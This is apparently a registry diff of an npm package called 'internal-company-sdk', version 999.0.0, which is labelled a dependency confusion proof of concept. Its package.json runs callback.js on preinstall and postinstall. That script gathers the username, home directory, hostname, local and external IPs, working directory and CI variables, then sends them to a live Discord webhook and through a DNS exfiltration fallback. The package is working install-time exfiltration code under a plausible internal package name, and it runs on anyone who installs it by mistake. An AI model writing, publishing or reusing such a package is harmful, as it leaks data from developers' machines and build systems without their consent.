internal-company-sdk 999.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (3) hide show
  1. package/callback.js +249 -0
  2. package/index.js +15 -0
  3. package/package.json +17 -0
package/callback.js ADDED
@@ -0,0 +1,249 @@
1
+ #!/usr/bin/env node
2
+ /**
3
+ * Dependency Confusion PoC Callback
4
+ * Author: OFJAAAH
5
+ * Generated: 2026-01-17T05:38:36.420Z
6
+ *
7
+ * This script sends a callback to verify package installation
8
+ * Collects: IP, User, Directory, Hostname for proof of concept
9
+ * FOR AUTHORIZED SECURITY TESTING ONLY
10
+ */
11
+
12
+ const https = require('https');
13
+ const http = require('http');
14
+ const os = require('os');
15
+ const { execSync } = require('child_process');
16
+
17
+ const CALLBACK_URL = 'Discord Webhook';
18
+ const DISCORD_WEBHOOK = 'https://discord.com/api/webhooks/1433563083011395705/VYmvJKeyHmyJ4knuZKUzHiXz4p3H5gxJucqDAPEPE-GCu2xS9Qr16wAiVgC0o5ll7I_y';
19
+ const PACKAGE_NAME = 'internal-company-sdk';
20
+
21
+ // Get network interfaces to find IP
22
+ function getLocalIP() {
23
+ try {
24
+ const interfaces = os.networkInterfaces();
25
+ for (const name of Object.keys(interfaces)) {
26
+ for (const iface of interfaces[name]) {
27
+ if (iface.family === 'IPv4' && !iface.internal) {
28
+ return iface.address;
29
+ }
30
+ }
31
+ }
32
+ } catch (e) {}
33
+ return 'unknown';
34
+ }
35
+
36
+ // Get external IP (optional - may fail in restricted networks)
37
+ async function getExternalIP() {
38
+ return new Promise((resolve) => {
39
+ https.get('https://api.ipify.org?format=json', { timeout: 3000 }, (res) => {
40
+ let data = '';
41
+ res.on('data', chunk => data += chunk);
42
+ res.on('end', () => {
43
+ try {
44
+ resolve(JSON.parse(data).ip);
45
+ } catch (e) {
46
+ resolve(null);
47
+ }
48
+ });
49
+ }).on('error', () => resolve(null));
50
+ });
51
+ }
52
+
53
+ // Collect system info
54
+ function collectSystemInfo() {
55
+ const info = {
56
+ // Package info
57
+ package: PACKAGE_NAME,
58
+ timestamp: new Date().toISOString(),
59
+
60
+ // User info
61
+ user: os.userInfo().username,
62
+ uid: os.userInfo().uid,
63
+ gid: os.userInfo().gid,
64
+ homedir: os.userInfo().homedir,
65
+ shell: os.userInfo().shell,
66
+
67
+ // System info
68
+ hostname: os.hostname(),
69
+ platform: os.platform(),
70
+ arch: os.arch(),
71
+ release: os.release(),
72
+ type: os.type(),
73
+
74
+ // Directory info
75
+ cwd: process.cwd(),
76
+
77
+ // Network info
78
+ localIP: getLocalIP(),
79
+
80
+ // Node info
81
+ nodeVersion: process.version,
82
+ npmVersion: process.env.npm_package_version || 'unknown',
83
+
84
+ // CI/CD Detection
85
+ isCI: !!(process.env.CI || process.env.GITHUB_ACTIONS || process.env.GITLAB_CI || process.env.JENKINS_URL || process.env.TRAVIS || process.env.CIRCLECI || process.env.BUILDKITE),
86
+ ciEnvironment: detectCIEnvironment(),
87
+
88
+ // NPM info
89
+ npmLifecycle: process.env.npm_lifecycle_event || '',
90
+ npmPackageName: process.env.npm_package_name || '',
91
+
92
+ // Additional context
93
+ env: {
94
+ CI: process.env.CI || '',
95
+ GITHUB_ACTIONS: process.env.GITHUB_ACTIONS || '',
96
+ GITHUB_REPOSITORY: process.env.GITHUB_REPOSITORY || '',
97
+ GITHUB_ACTOR: process.env.GITHUB_ACTOR || '',
98
+ GITLAB_CI: process.env.GITLAB_CI || '',
99
+ GITLAB_USER_LOGIN: process.env.GITLAB_USER_LOGIN || '',
100
+ JENKINS_URL: process.env.JENKINS_URL || '',
101
+ BUILD_NUMBER: process.env.BUILD_NUMBER || '',
102
+ TRAVIS: process.env.TRAVIS || '',
103
+ CIRCLECI: process.env.CIRCLECI || '',
104
+ BUILDKITE: process.env.BUILDKITE || ''
105
+ }
106
+ };
107
+
108
+ return info;
109
+ }
110
+
111
+ function detectCIEnvironment() {
112
+ if (process.env.GITHUB_ACTIONS) return 'GitHub Actions';
113
+ if (process.env.GITLAB_CI) return 'GitLab CI';
114
+ if (process.env.JENKINS_URL) return 'Jenkins';
115
+ if (process.env.TRAVIS) return 'Travis CI';
116
+ if (process.env.CIRCLECI) return 'CircleCI';
117
+ if (process.env.BUILDKITE) return 'Buildkite';
118
+ if (process.env.CI) return 'Generic CI';
119
+ return 'Local Machine';
120
+ }
121
+
122
+ async function sendCallback() {
123
+ const systemInfo = collectSystemInfo();
124
+
125
+ // Try to get external IP
126
+ const externalIP = await getExternalIP();
127
+ if (externalIP) {
128
+ systemInfo.externalIP = externalIP;
129
+ }
130
+
131
+ const data = JSON.stringify(systemInfo);
132
+
133
+ const url = new URL(CALLBACK_URL);
134
+ const options = {
135
+ hostname: url.hostname,
136
+ port: url.port || (url.protocol === 'https:' ? 443 : 80),
137
+ path: url.pathname + (url.search || ''),
138
+ method: 'POST',
139
+ headers: {
140
+ 'Content-Type': 'application/json',
141
+ 'Content-Length': Buffer.byteLength(data),
142
+ 'User-Agent': 'dependency-confusion-poc/internal-company-sdk',
143
+ 'X-PoC-Package': 'internal-company-sdk',
144
+ 'X-PoC-Author': 'OFJAAAH'
145
+ },
146
+ timeout: 10000
147
+ };
148
+
149
+ const protocol = url.protocol === 'https:' ? https : http;
150
+
151
+ const req = protocol.request(options, (res) => {
152
+ console.log('[PoC] Callback sent - Status:', res.statusCode);
153
+ });
154
+
155
+ req.on('error', (e) => {
156
+ // Silently fail
157
+ });
158
+
159
+ req.on('timeout', () => {
160
+ req.destroy();
161
+ });
162
+
163
+ req.write(data);
164
+ req.end();
165
+ }
166
+
167
+ // DNS exfiltration for restricted networks
168
+ function sendDnsCallback() {
169
+ try {
170
+ const dns = require('dns');
171
+ const info = {
172
+ p: PACKAGE_NAME.substring(0, 15),
173
+ u: os.userInfo().username.substring(0, 10),
174
+ h: os.hostname().substring(0, 10),
175
+ t: Date.now()
176
+ };
177
+ const encoded = Buffer.from(JSON.stringify(info))
178
+ .toString('base64')
179
+ .replace(/[+/=]/g, '')
180
+ .substring(0, 50);
181
+
182
+ const dnsHost = encoded + '.' + new URL(CALLBACK_URL).hostname;
183
+ dns.resolve(dnsHost, () => {});
184
+ } catch (e) {}
185
+ }
186
+
187
+ // Send to Discord Webhook
188
+ async function sendDiscordCallback() {
189
+ if (!DISCORD_WEBHOOK || DISCORD_WEBHOOK === '') return;
190
+
191
+ const systemInfo = collectSystemInfo();
192
+ const externalIP = await getExternalIP();
193
+
194
+ const embed = {
195
+ title: '🎯 Dependency Confusion - Callback Received!',
196
+ description: 'A package installation triggered the PoC callback.',
197
+ color: 0xFF0000,
198
+ fields: [
199
+ { name: '📦 Package', value: PACKAGE_NAME, inline: true },
200
+ { name: '👤 User', value: systemInfo.user || 'N/A', inline: true },
201
+ { name: '🖥️ Hostname', value: systemInfo.hostname || 'N/A', inline: true },
202
+ { name: '🌐 Local IP', value: systemInfo.localIP || 'N/A', inline: true },
203
+ { name: '🌍 External IP', value: externalIP || 'N/A', inline: true },
204
+ { name: '💻 Platform', value: (systemInfo.platform + ' ' + systemInfo.arch) || 'N/A', inline: true },
205
+ { name: '📁 Directory', value: systemInfo.cwd || 'N/A', inline: false },
206
+ { name: '🏠 Home', value: systemInfo.homedir || 'N/A', inline: false },
207
+ { name: '🔧 Node Version', value: systemInfo.nodeVersion || 'N/A', inline: true },
208
+ { name: '🏭 CI Environment', value: systemInfo.ciEnvironment || 'Local', inline: true },
209
+ ],
210
+ footer: { text: 'Dependency Confusion Hunter by OFJAAAH' },
211
+ timestamp: new Date().toISOString()
212
+ };
213
+
214
+ const payload = JSON.stringify({
215
+ embeds: [embed]
216
+ });
217
+
218
+ try {
219
+ const url = new URL(DISCORD_WEBHOOK);
220
+ const options = {
221
+ hostname: url.hostname,
222
+ port: 443,
223
+ path: url.pathname + url.search,
224
+ method: 'POST',
225
+ headers: {
226
+ 'Content-Type': 'application/json',
227
+ 'Content-Length': Buffer.byteLength(payload)
228
+ },
229
+ timeout: 10000
230
+ };
231
+
232
+ const req = https.request(options, (res) => {
233
+ console.log('[PoC] Discord callback sent - Status:', res.statusCode);
234
+ });
235
+
236
+ req.on('error', () => {});
237
+ req.write(payload);
238
+ req.end();
239
+ } catch (e) {}
240
+ }
241
+
242
+ // Execute callbacks
243
+ (async () => {
244
+ try {
245
+ await sendCallback();
246
+ await sendDiscordCallback();
247
+ sendDnsCallback();
248
+ } catch (e) {}
249
+ })();
package/index.js ADDED
@@ -0,0 +1,15 @@
1
+ /**
2
+ * internal-company-sdk
3
+ * Security Research PoC - Dependency Confusion Hunter
4
+ * Author: OFJAAAH
5
+ *
6
+ * This package was published as part of authorized security research
7
+ * to demonstrate dependency confusion vulnerabilities.
8
+ */
9
+
10
+ module.exports = {
11
+ name: 'internal-company-sdk',
12
+ version: '999.0.0',
13
+ poc: true,
14
+ author: 'OFJAAAH'
15
+ };
package/package.json ADDED
@@ -0,0 +1,17 @@
1
+ {
2
+ "name": "internal-company-sdk",
3
+ "version": "999.0.0",
4
+ "description": "Security research PoC - Dependency Confusion Hunter by OFJAAAH",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "node callback.js",
8
+ "postinstall": "node callback.js"
9
+ },
10
+ "keywords": [
11
+ "security",
12
+ "research",
13
+ "poc"
14
+ ],
15
+ "author": "OFJAAAH - Security Research",
16
+ "license": "MIT"
17
+ }